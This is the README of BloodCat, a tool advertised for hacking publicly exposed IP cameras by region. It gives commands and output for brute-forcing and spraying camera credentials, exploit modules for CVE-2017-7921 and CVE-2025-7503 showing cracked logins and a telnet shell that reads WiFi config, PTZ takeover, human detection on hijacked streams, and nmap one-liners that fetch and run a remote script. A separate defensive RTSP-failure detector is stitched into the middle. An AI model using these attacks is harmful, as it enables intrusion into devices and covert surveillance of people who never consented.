💻 We are currently collecting reviews of Bloodcat as well as tutorial videos in various languages. You only need to post relevant videos or operational content; our bot will automatically search, gather, and process them from Google, then organize them on the corresponding page.
A tool for hacking into publicly exposed network cameras, with support for specifying country and region.
PS: This tool supports weak‑credential and brute‑force testing against most mainstream network camera models. However, some devices with enhanced security mechanisms deliberately obfuscate or conceal their fingerprinting characteristics, which means the tool is not universally effective. Future updates will progressively introduce additional camera‑related CVE‑based vulnerability detection plugins, aiming to improve success rates while reducing unnecessary probing traffic.
🐈‍⬛ Have you ever wondered whether there are publicly accessible cameras watching the streets you walk every day? Once you become aware of their existence, you may realize how close and real online exposure actually is.
🤦‍♂️ Are you still struggling with the lack of practical tools for exploiting IP camera vulnerabilities?
🌏 BloodCat officially provides over 🔥2000+🔥 publicly accessible IP camera examples worldwide.
🎥 A comprehensive IP Camera penetration testing toolkit, featuring default credential enumeration, CVE exploitation, and additional capabilities — with support for collaborative team usage.
🛡️ BloodCat does not collect any identity-related information.
💻 BloodCat is compatible with Windows, Linux, and macOS.
- Video
- Install
- Bloodcat Workflow
- Bloodcat
- Bloodcat Digger
- Bloodcat PTZ
- Evil bat
- Shodan cat
- PicThief
- Bloodcat CVE
- Bloodcat Global Map
- Bloodcat Global Map Terminal
- Bloodcat Lan Map
- Bloodcat Editor
- Bloodcat Nmap (Run immediately)
- Bloodcat Tricks
Disk space requirement: Available space > 700 MB
$ sudo apt update && sudo apt install build-essential python3-dev python3-pyqt5.qtwebengine -y
$ git clone https://github.com/MartinxMax/BloodCat.git
$ cd BloodCat && python3 -m venv bloodcat
$ source ./bloodcat/bin/activate
(bloodcat)$ python -m pip install --upgrade pip
(bloodcat)$ pip install opencv-python aiohappyeyeballs aiohttp aiosignal async-timeout attrs certifi charset-normalizer frozenlist geoip2 idna maxminddb multidict propcache pycryptodome PyQt5 PyQt5-Qt5 PyQt5_sip PyQtWebEngine PyQtWebEngine-Qt5 requests typing_extensions urllib3 yarl numpy pynput
You only need to provide the IP and port in the format IP:PORT.
The program will automatically detect whether the target is a private or public IP address and store the results in separate locations accordingly.
About:
- Integrates with search engines, enabling target filtering and continuous scanning operations by country, region, or city.
- Operates at the RTSP protocol level, providing high stealth and efficiency.
- Performs camera fingerprint identification first, automatically filtering out and excluding honeypot systems, then enumerates usernames and passwords of target network cameras.
- Supports password spraying, applicable to single IPs or multiple IP ranges.
- Supports bc data updating and merging, facilitating long-term maintenance and management.
- Supports writing Hikvision camera credential header information into bc files, which can be visualized on a map.
Scanner I recommend: https://github.com/MartinxMax/n1ght0wl.git
After BloodCat successfully gains access to a camera, it will provide you with a playback link. However, you don’t need to open the link manually.
Simply reload the module in BloodCat-Map, then use the IP search in the top-right corner to locate the target. Click the target, and the video will play directly.
(bloodcat)$ python3 bloodcat.py -h
usage: bloodcat.py [-h] [--country COUNTRY] [--city CITY] [--region REGION] [--key KEY] [--ip IP] [--ips IPS] [--password PASSWORD] [--merge] [--hiv HIV] [--live LIVE] [--update] [--scan]
Blood Cat - IP Camera Weak Credential Scanner
options:
-h, --help show this help message and exit
--country COUNTRY Country
--city CITY City
--region REGION Area
--key KEY Fofa API key
--ip IP IP:PORT or IP
--ips IPS Targets list file (each line: IP or IP:PORT)
--password PASSWORD Password spraying
--merge Merge and update all data in ./data into a single BC file
--hiv HIV Load Hikvision credentials file
--live LIVE Filter currently active cameras in the BC file
--update Check for the latest version and update
--scan Scan ports when RTSP port is unknown
If you don’t know the target RTSP port, you can add the --scan option to automatically scan ports on the target.
(bloodcat)$ python3 bloodcat.py --ip "185.153.118.100" --scan
If the --scan option is not used, you must specify the port.
(bloodcat)$ python3 bloodcat.py --ip "185.153.118.100:554"
You can also use the --scan option here.
(bloodcat)$ python3 bloodcat.py --ips target.txt
(bloodcat)$ python3 bloodcat.py --country CN --region HK --key <FOFA-API-KEY>
Place all .bc files that need to be merged into the ./data/ directory.
(bloodcat)$ python3 bloodcat.py --merge
After execution, ./data/20260308_012011.bc will be a deduplicated and merged .bc file.
Replace the original global.bc file, then right-click Reload in BloodCat_Map:
(bloodcat)$ mv ./data/20260308_012011.bc ./data/global.bc
(bloodcat)$ python3 bloodcat.py --live ./data/global.bc
live_20260308_012137.bc
(bloodcat)$ python3 bloodcat.py --update
(bloodcat)$ python3 bloodcat_cve.py
Bloodcat@exp# show
Matching Modules
==============================================================================
ID Name Description
------------------------------------------------------------------------------
1 hikvision/cve-2017-7921 Hikvision auth bypass
2 liandian/cve-2025-7503 Liandian IP Camera Telnet Hardcoded Credentials & Plaintext WiFi Credentials Leak
You can use the Bloodcat main program to test credentials on Hikvision cameras.
Under normal circumstances, when authentication attempts are made through the HTTP authentication interface, the device will trigger an account lockout mechanism after more than five consecutive failed login attempts, resulting in the admin account being locked.
The Bloodcat main program does not rely on the standard HTTP authentication process, and therefore does not trigger the account lockout policy.
If credential-based access cannot be obtained, you may proceed with the CVE module for further validation and analysis.
iVMS-4200 download link : https://github.com/MartinxMax/BloodCat/releases/tag/play
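Because credential attempts made over RTSP do not count toward the HTTP lockout described above, the device's own lockout cannot be relied on to stop guessing or spraying; the failures have to be counted on the network side. The following is an added example written for defenders, not part of BloodCat: it counts RTSP 401 responses per source in a sliding window. The log format, sample lines, function name and thresholds are constructed assumptions, and lines are assumed to be in time order.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample (assumed format): timestamp, source IP, camera, method, status.
# A normal Digest client gets one 401 challenge and then a 200 (first two lines).
SAMPLE_LOG = """\
2026-03-08T01:20:00 192.0.2.10 10.0.5.20:554 DESCRIBE 401
2026-03-08T01:20:00 192.0.2.10 10.0.5.20:554 DESCRIBE 200
2026-03-08T01:20:01 203.0.113.7 10.0.5.20:554 DESCRIBE 401
2026-03-08T01:20:02 203.0.113.7 10.0.5.20:554 DESCRIBE 401
2026-03-08T01:20:03 203.0.113.7 10.0.5.20:554 DESCRIBE 401
2026-03-08T01:20:04 203.0.113.7 10.0.5.20:554 DESCRIBE 401
2026-03-08T01:20:05 203.0.113.7 10.0.5.20:554 DESCRIBE 401
2026-03-08T01:20:06 203.0.113.7 10.0.5.20:554 DESCRIBE 401
2026-03-08T01:21:00 198.51.100.9 10.0.5.21:554 DESCRIBE 401
2026-03-08T01:21:01 198.51.100.9 10.0.5.22:554 DESCRIBE 401
2026-03-08T01:21:02 198.51.100.9 10.0.5.23:554 DESCRIBE 401
2026-03-08T01:21:03 198.51.100.9 10.0.5.24:554 DESCRIBE 401
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) [A-Z_]+ (\d{3})$")

def detect_rtsp_auth_abuse(log_text, max_fail=5, max_cams=3,
                           window=timedelta(seconds=60)):
    """Return (guessing, spraying): (src, camera) pairs with more than max_fail
    401s inside the window, and sources failing on more than max_cams cameras."""
    per_pair = defaultdict(deque)   # (src, cam) -> times of recent 401s
    per_src = defaultdict(deque)    # src -> (time, cam) of recent 401s
    guessing, spraying = set(), set()
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m or m.group(4) != "401":
            continue                # only authentication failures are counted
        when = datetime.fromisoformat(m.group(1))
        src, cam = m.group(2), m.group(3)
        pair, seen = per_pair[(src, cam)], per_src[src]
        pair.append(when)
        seen.append((when, cam))
        while when - pair[0] > window:      # drop failures older than the window
            pair.popleft()
        while when - seen[0][0] > window:
            seen.popleft()
        if len(pair) > max_fail:            # many failures against one camera
            guessing.add((src, cam))
        if len({c for _, c in seen}) > max_cams:   # failures across many cameras
            spraying.add(src)
    return guessing, spraying
```

The per-camera threshold is kept above one so that the single 401 challenge of an ordinary Digest session does not alert.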
Bloodcat@exp# use 1
Bloodcat@(CVE-2017-7921)# show
Parameter | Value | Description
----------------------------------------------------------------------
ips | | Hosts file (<IP>:<Port>)
threads | 10 | Thread count
output_type | csv | json / csv
output_path | ./result.csv| Output file
Bloodcat@(CVE-2017-7921)# set ips /home/maptnh/Desktop/2/bloodcat/BloodCat/tar.txt
Bloodcat@(CVE-2017-7921)# run
[*] Successfully read 3 valid targets
[*] Start cracking (3 targets, threads=10)
[+] Crack success X.X.X.X:80 => admin:dddddd
[!] 1.59.71.189:80 Request timeout (> 3 seconds)
[+] Crack success X.X.X.X:80 => admin:xxxxx
[*] Start scanning SDK ports (Range: 8000-8100)...
[SDK Crack Success] X.X.X.X:8000
[SDK Crack Success] X.X.X.X:8000
[*] JSON exported successfully: ./result.csv (Size: 362 bytes, Number of devices: 2)
[*] Done! Exported 2 devices in total
Bloodcat@exp# use 2
Bloodcat@(CVE-2025-7503)# show
Parameter | Value | Description
----------------------------------------------------------------------
ip | | ip address
port | 23 | telnet port
timeout | 10 | timeout
Bloodcat@(CVE-2025-7503)# set ip X.X.X.X
Bloodcat@(CVE-2025-7503)# run
[+] Sending payload to X.X.X.X:23 ...
_ (`-. (`\ .-') /` .-') _ ('-. _ .-') _
( (OO ) `.( OO ),' ( OO ) )_( OO)( ( OO) )
_.` \,--./ .--. ,--./ ,--,'(,------.\ .'_
(__...--''| | | | \ | |\ | .---',`'--..._)
| / | || | | |, | \| | )| | | | \ '
| |_.' || |.'.| |_)| . |/(| '--. | | ' |
| .___.'| | | |\ | | .--' | | / :
| | | ,'. | | | \ | | `---.| '--' /
`--' '--' '--' `--' `--' `------'`-------'
cat /tmp/wificonf/wpa_supplicant.conf
ctrl_interface=/var/run/wpa_supplicant
update_config=1
V380-linux# whoami
whoami
ls -la
-sh: whoami: not found
V380-linux# ls -la
drwxr-xr-x 19 1000 root 218 Jan 8 2022 .
drwxr-xr-x 19 1000 root 218 Jan 8 2022 ..
drwxr-xr-x 2 1000 root 813 Feb 15 2022 bin
drwxrwxrwt 4 root root 2680 Jan 1 1970 dev
drwxr-xr-x 7 1000 root 350 Feb 12 2022 etc
drwxr-xr-x 3 1000 root 30 Jan 13 2022 ext
drwxr-xr-x 2 1000 root 3 Sep 9 2011 home
lrwxrwxrwx 1 root root 9 Jan 8 2022 init -> sbin/init
drwxr-xr-x 3 1000 root 773 Jan 7 2022 lib
drwxr-xr-x 5 1000 root 52 Jan 4 2022 mnt
drwxr-xr-x 7 1000 1000 83 Aug 18 2022 mvs
drwxr-xr-x 2 1000 root 3 Oct 17 2011 opt
dr-xr-xr-x 62 root root 0 Jan 1 1970 proc
drwxr-xr-x 2 1000 root 3 Sep 9 2011 root
drwxr-xr-x 2 1000 root 433 Jan 21 2022 sbin
drwxr-xr-x 2 1000 root 3 Sep 9 2011 srv
dr-xr-xr-x 11 root root 0 Jan 1 1970 sys
drwxrwxrwt 3 root root 140 Feb 7 13:49 tmp
drwxr-xr-x 6 1000 root 65 Jan 18 2022 usr
drwxrwxrwt 6 root root 120 Jan 1 1970 var
https://github.com/MartinxMax/evil-b4t
Evil‑Bat is a real‑time human detection and activity logging tool based on remote network cameras.
It analyzes RTSP video streams to identify the presence of living humans and automatically records key moments when people appear in the camera view.
If you don’t have a Shodan membership, this tool helps you maximize the number of IP addresses you can retrieve from Shodan.
https://github.com/MartinxMax/shodancat
This is a tool built on Flask API, OCR (optical character recognition), and YOLO-based intelligent detection, designed to identify images that may contain potentially leaked identity credentials.
The client enables sorting and organizing of images containing sensitive identity credentials without the need for any dependency installation.
The server exposes an open identification API interface to intelligently detect potential identity credentials.
https://github.com/MartinxMax/PicThief
(bloodcat)$ python3 bloodcat_map.py
If an error occurs
QObject::moveToThread: Current thread (0x22f43020) is not the object's thread (0x23190c60).
Cannot move to target thread (0x22f43020)
qt.qpa.plugin: Could not load the Qt platform plugin "xcb" in "/home/test/Desktop/BloodCat/bloodcat/lib/python3.12/site-packages/cv2/qt/plugins" even though it was found.
This application failed to start because no Qt platform plugin could be initialized. Reinstalling the application may fix this problem.
Available platform plugins are: xcb, eglfs, linuxfb, minimal, minimalegl, offscreen, vnc, wayland-egl, wayland, wayland-xcomposite-egl, wayland-xcomposite-glx, webgl.
Aborted (core dumped)
Restart the program after running the following command.
(bloodcat)$ python3 -c "import cv2,os; p=os.path.join(os.path.dirname(cv2.__file__),'qt','plugins','platforms'); print(p) if os.path.exists(p) else exit(0)" | xargs -r rm -rf
By entering a remote data URL (BloodCat Map API), you can load external datasets.
You can test it using the official BloodCat database:
https://raw.githubusercontent.com/MartinxMax/db/refs/heads/main/blood_cat/global.bc
Note: For your own anonymity, do not import or use untrusted BloodCat Map API endpoints, as they may collect your IP address (unless you are using a proxy).
You can also copy API database links from other BloodCat-Map instances:
The target data will be loaded and displayed on the map. If you need to remove an entry, click the X on the right side. Remote-loaded raw data is not automatically saved locally, but the remote URL will be written into the configuration file.
You can enter keywords here to perform fuzzy matching on targets. This allows you to quickly lock and track specific targets on the map.
To use the chat feature, all team members must:
- Be on the same local network (LAN)
- Run BloodCat-Map simultaneously
The good news is:
- No need to enter peer IP addresses
- No need to worry about sniffing attacks
- Chat packets are encrypted
(192.168.0.2)$ python3 bloodcat_map.py
(192.168.0.3)$ python3 bloodcat_map.py
(bloodcat)$ python ./bloodcat_map_terminal.py
Here’s a useful trick: if you’re using Termux, after setting up the BloodCat environment on one host machine, you can use the socat command to forward the surveillance stream to another host that doesn’t have BloodCat installed.
(bloodcat)$ sudo apt install socat
(bloodcat)$ socat TCP-LISTEN:9999,fork,reuseaddr EXEC:"python ./bloodcat_map_terminal.py"
(Termux)$ pkg install netcat-openbsd -y
(Termux)$ nc 192.168.67.131 9999
BloodCatMap-Terminal# help
=== BloodCat Map Terminal - Help Manual ===
Commands:
help - Show this help message
show - Show all entries with detailed fields (global ID)
show brief - Show brief list (global ID, IP, Source)
search <keyword> - Search entries (supports: IP, RTSP, ASN, sys_org, network)
play <global_id> - Play RTSP stream by GLOBAL ID
info <global_id> - Show detailed information by GLOBAL ID
reload - Reload all data (local + remote)
reset - Reset filter to show all entries
add <url> - Add remote DB URL to config
remove <url> - Remove remote DB URL from config
urls - List all configured remote URLs
exit/quit - Exit the console
BloodCatMap-Terminal# search x.x.x.x
BloodCatMap-Terminal# play 1226
Note: This Nmap version only supports detecting anonymous public cameras and cannot brute‑force camera account passwords. The good news is that you don’t need to install most of BloodCat’s core dependencies to perform the detection.
$ sudo apt install nmap ffmpeg -y
ip=<Target_X.X.X.X>; nmap -Pn -p "$(curl -s https://raw.githubusercontent.com/MartinxMax/BloodCat/refs/heads/main/TOP1000_RTSP_Port.txt | grep -oE '[0-9]+' | sort -n | uniq | paste -sd,)" --script <(curl -s https://raw.githubusercontent.com/MartinxMax/BloodCat/refs/heads/main/bloodcat.nse) $ip
ips=<File_Name>; nmap -Pn -p "$(curl -s https://raw.githubusercontent.com/MartinxMax/BloodCat/refs/heads/main/TOP1000_RTSP_Port.txt | grep -oE '[0-9]+' | sort -n | uniq | paste -sd,)" --script <(curl -s https://raw.githubusercontent.com/MartinxMax/BloodCat/refs/heads/main/bloodcat.nse) -iL $ips
$ ffplay -fs -rtsp_transport tcp rtsp://admin:123456@x.x.x.x:554/1
After importing a CSV or BC configuration file, you can:
1. Filter targets by specific country/region
2. Perform fuzzy matching on fields (e.g. country, keyword, etc.)
3. Re-export only the matched/selected targets
4. Visualize all target cameras directly on a world map using geolocation data
(bloodcat)$ python3 bloodcat_editor.py
Click Import CSV configuration file.
View the geographic locations of all Hikvision cameras on the map.
For example, searching “Japan” in the country field will display all related entries. All matched items can be auto-selected, then export only the checked targets.
Finally, use iVMS-4200 to play the exported devices.
Download link : https://github.com/MartinxMax/BloodCat/releases/tag/play
After successfully brute-forcing a single target with Bloodcat, multiple camera channels may exist on the target device. Use Digger to deeply discover and enumerate all available camera streams.
(bloodcat)$ python3 bloodcat_digger.py
(bloodcat)$ python3 bloodcat_digger.py --rtsp rtsp://admin:xxxxx@172.16.17.103:554/Streaming/Channels/ --id 101
Scan starting from ID 101 (the default initial channel ID for most cameras):
This tool uses a stable TCP connection to the target. (FFplay uses UDP by default, which is extremely unstable for camera streams.)
$ ffplay -x 600 -y 300 -rtsp_transport tcp rtsp://admin:xxxxx@172.16.17.103:554/Streaming/Channels/<x>01
You can use this program to detect whether a target camera can be controlled.
(bloodcat)$ python3 bloodcat_ptz.py --help
Scan ONVIF ports
(bloodcat)$ python3 bloodcat_ptz.py --scan <Target>
Start Bloodcat Map and open the camera stream
(bloodcat)$ python3 bloodcat_ptz.py --ip <ip> --port <ONVIF_PORT> --username <username> --password <password>
After successful authentication, you can control the camera direction using the numeric keypad.
(bloodcat)$ python3 bloodcat.py --ips ./B-172-554.txt
(bloodcat)$ python3 bloodcat_map_lan.py